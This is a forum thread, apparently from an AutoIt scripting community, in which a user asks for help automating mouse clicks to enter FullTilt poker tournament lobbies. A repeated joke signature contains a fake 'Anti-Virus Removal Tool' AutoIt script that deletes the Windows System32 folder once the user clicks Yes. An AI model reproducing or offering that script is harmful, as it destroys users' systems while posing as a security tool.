Jump to content

Recommended Posts

Posted

What do you need help with?

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Posted

I see you have MSN. Try to message me at dot.halo@yahoo.com

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Posted

Ok. The code you're gonna use most often is MouseClick. I'm gonna ask you a few questions.

1.)Do you have AutoIt installed?

2.)Do you have Internet Explorer, Mozilla Firefox, or other?

3.)If you have AutoIt installed please open Scite. (Start > All Programs > AutoIt v3 > Scite Script Editor).

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Posted

We'll go from there.

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Posted

Ok. The code you're gonna use most often is MouseClick. I'm gonna ask you a few questions.

1.)Do you have AutoIt installed?

2.)Do you have Internet Explorer, Mozilla Firefox, or other?

3.)If you have AutoIt installed please open Scite. (Start > All Programs > AutoIt v3 > Scite Script Editor).

1. yes

2. yes to both

Posted (edited)

You're wanting to use this to enter into a 'lobby' for a poker game you're playing. I checked out the site and it seems that you have to download a program from their site and do everything from there. Is this correct?

Edited by Firefoxy
;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf
Posted (edited)

You're wanting to use this to enter into a 'lobby' for a poker game you're playing. I checked out the site and it seems that you have to download a program from their site and do everything from there. Is this correct?

I can only assume that I have to.

I mean I play on FullTilt.

I have to make my mouse movements and clicks to get into the tournement at the two differant lobbys.

It's just that I'm to slow and unco-ordinated.

The problem is that when you double click on the game that you want to get into; you get sent to the next lobby; the curser doesn't default to the next button; so it requires a mouse move and then a click & then another mouse move & click and then another move & click.

I'm sure that there are people that use a program to do this because it fills up so rapidly.

This is a free tournement which leads to winning a seat into a tournement where you can win some cash; which can lead to other things.

Does this information give you any ideas; or do you need more info?

I really appreciate the time.

Edited by CaseyBaugh
Posted (edited)

I Added You On Msn... If You Sign In We Can Talk And I Can Most Likely Help You....

Where would I go on MSN?

I do another user name on MSN Arjuna4243.

I'm not quite sure where to go to talk to you. Is it IM?

Edited by CaseyBaugh
Posted

Hlo CaseyBaugh

Please supply some information about Poker After Dark ?

Is it a daily tournament ?

Is it a daily feeder to a monthly event ?

Do you register with FTP Points or Cash ?

Thanks

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...